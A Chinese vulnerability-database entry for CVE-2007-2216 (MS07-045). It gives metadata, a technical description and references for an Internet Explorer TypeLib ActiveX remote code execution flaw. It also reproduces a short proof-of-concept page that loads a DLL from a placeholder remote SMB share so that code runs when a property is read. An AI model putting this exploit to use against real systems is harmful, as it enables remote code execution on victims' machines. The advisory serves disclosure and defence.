Microsoft IE tblinf32.dll ActiveX控件远程代码执行漏洞(MS07-045)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112884 漏洞类型 配置错误
发布时间 2007-05-08 更新时间 2007-08-30
CVE编号 CVE-2007-2216 CNNVD-ID CNNVD-200708-221
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/30490
https://www.securityfocus.com/bid/25289
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-221
|漏洞详情
"InternetExplorer是微软发布的非常流行的WEB浏览器。IE的tblinf32.dllActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞控制用户系统。IE中tblinf32.dll或vstlbinf.dllActiveX控件没有正确地实现IObjectsafety。TlbInf32.dll是一组COM对象,允许VisualBasic和C++程序员访问类型库。该库实现了IObjectSafety:ReportforClsid:{8B217746-717D-11CE-AB5B-D41203C10000}RegKeySafeforScript:FalseRegKeySafeforInit:FalseImplementsIObjectSafety:TrueIDispSafe:Safeforuntrusted:caller,dataTypeLibInfoFromFile()函数用于打开文件并从中检索typelib信息:TypeLibInfoFromFile(ByValFileNameAsString)AsTypeLibInfo这个函数会接受到DLL文件的webdav/smb共享,以便从远程服务器上的DLL检索信息。如果修改了TypeLibInfoFromFile()调用中的DLL文件将HelpStringDll属性定向到导出恶意DLLGetDocumentation函数的DLL,则在请求HelpString属性时就会执行这个函数。name=test>name=test>x=test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")'CalltheremoteDLLGetDocumentationfunctionalert(x.Interfaces.Item(a).Members.Item(b).HelpString)如果用户受骗访问了恶意站点的话就可能导致执行任意指令。成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限,那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。"
|漏洞EXP
source: http://www.securityfocus.com/bid/25289/info

The Microsoft Visual Basic 6 TypeLib Information Library (TLI) ActiveX control is prone to a remote code-execution vulnerability.

An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions. 

<object width=1000 height=20 classid="CLSID:<CLASSID>"
name=test></object>
x= test.TypeLibInfoFromFile("\\\\IPADDRESS\\SHARE\\remote.dll")
' Call the remote DLLGetDocumentation function
alert(x.Interfaces.Item(a).Members.Item(b).HelpString)
|受影响的产品
Microsoft Internet Explorer 5.0.1 SP4 - Microsoft Windows 2000 Advanced Server SP4 - Microsoft Windows 2000 Datacenter Server SP4 -
|参考资料

来源:US-CERT
名称:TA07-226A
链接:http://www.us-cert.gov/cas/techalerts/TA07-226A.html
来源:BID
名称:25289
链接:http://www.securityfocus.com/bid/25289
来源:BUGTRAQ
名称:20070815TlbInf32ActiveXCommandExecution
链接:http://www.securityfocus.com/archive/1/archive/1/476742/100/0/threaded
来源:OSVDB
名称:36396
链接:http://www.osvdb.org/36396
来源:VUPEN
名称:ADV-2007-2869
链接:http://www.frsirt.com/english/advisories/2007/2869
来源:SECTRACK
名称:1018562
链接:http://securitytracker.com/id?1018562
来源:SECUNIA
名称:26419
链接:http://secunia.com/advisories/26419
来源:USGovernmentResource:oval:org.mitre.oval:def:2109
名称:oval:org.mitre.oval:def:2109
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:2109